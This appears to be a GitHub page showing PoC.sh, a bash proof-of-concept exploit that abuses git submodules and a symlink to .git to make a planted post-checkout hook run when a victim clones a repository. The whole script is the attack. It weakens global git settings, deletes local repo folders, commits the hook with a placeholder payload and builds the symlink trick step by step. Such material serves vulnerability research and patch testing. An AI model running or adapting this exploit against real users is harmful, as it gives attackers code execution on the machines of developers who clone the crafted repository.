-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathPoC.sh
45 lines (37 loc) · 1.26 KB
/
PoC.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/bin/bash
# Configure Git to allow file protocol and enable symbolic links
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
# Clean up any existing repositories
rm -rf repo1
rm -rf repo2
# Clone the malicious repository
git clone http://<ip>:<port>/<name of the owner>/repo1.git
cd repo1
# Create a malicious post-checkout hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/sh
<Payload>
EOF
chmod +x y/hooks/post-checkout
# Add, commit, and push the malicious hook
git add y/hooks/post-checkout
git commit -m "Add malicious post-checkout hook"
git push
cd ..
# Clone another repository and set up the submodule
git clone http://<ip>:<port>/<name of the owner>/repo2.git
cd repo2
git submodule add --name x/y "http://<ip>:<port>/<name of the owner>/repo1.git" A/modules/x
git commit -m "Add submodule"
# Create a symbolic link to the .git directory
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "Add symbolic link"
git push
# Clone the malicious repository to trigger the hook
git clone http://<ip>:<port>/<name of the owner>/repo2.git